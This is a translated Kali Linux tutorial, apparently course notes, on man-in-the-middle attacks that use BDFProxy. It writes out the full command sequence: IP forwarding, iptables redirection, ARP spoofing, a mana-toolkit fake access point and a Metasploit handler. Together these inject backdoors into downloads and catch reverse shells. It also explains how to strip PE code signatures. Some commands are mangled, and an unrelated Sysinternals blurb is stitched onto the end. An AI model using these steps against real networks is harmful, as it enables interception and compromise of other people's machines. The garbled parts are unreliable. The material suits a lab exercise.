This article records the detailed process of learning and using Kali Linux 2018.1 and penetration testing. The tutorial is the course "Kali Linux Penetration Testing" in the Security Niu Classroom
1 Introduction
Bdfproxy(mitmproxy)
- Dynamic injection of shellcode (ARP spoof, DNS spoof, Fake AP) based on traffic hijacking (man-in-the-middle attack)
step
- sysctl -w net.ipv4.ip_forward=1
- iptables -t nat -A PREROUTING -p tcp –dport 80/443 -j REDIRECT –to-ports 8080
- vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
to modify the listening IP address bdfproxy
- proxyMode = transparent
arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
start msf
process
- mana creates Fack AP
- badfproxy proxy injection code
- msf listens for bounce shells
2. Use
Modify IP forwarding
root@kali:~# vim /etc/sysctl.conf net.ipv4.ip_forward=1
Modify iptables
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
Modify the configuration file
root@kali:~# vim /etc/bdfproxy/bdfproxy.cfg proxyMode = transparent HOST = 10.10.10.131 #108行,117行,128行,替换所有的,有6个
start bdfproxy
root@kali:~# bdfproxy
start msfconsole
root@kali:~# msfconsole -r /root/bdfproxy_msf_resource.rc msf exploit(multi/handler) > jobs
arp cheat
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 10.10.10.2
The target drone accesses the browser to download the software and runs it
![](https://i.imgur.com/1qLFgFZ.png)
3. Wireless traffic hijacking
vi /etc/mana-toolkit/hostapd-mana.conf
- Modify the wireless SSID name
./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
- Modify wlan1 wireless network card adapter and start
- iptables -t nat -A PREROUTING -i $phy -p tcp –dport 80/443 -j REDIRECT –to-port 8080
vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
- Modify the listening IP address and start badfproxy
start msf
- msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
to add on
- Site-wide HTTPS anti-injection (Microsoft has code for every patch)
- PE file certificate signature can be cleared
- PE Header -> Optional Header -> Certificate Table(Address and size)
- Overwrite all with 0
- BDF clears digital signatures by default
https://live.sysinternals.com/
This is the file share that allows access to all Sysinternals utilities. We have developed this function to test an alternative allocation mechanism for our utility.
This will allow you to run these tools from any computer connected to the internet without navigating to a web page, downloading and unzipping the zip file.
The Sysinternals website was created by Mark Russinovich in 1996 to host his advanced system utilities and technical information. Whether you are an IT professional or a developer, you can find Sysinternals utilities to help you manage, diagnose and diagnose Windows systems and applications.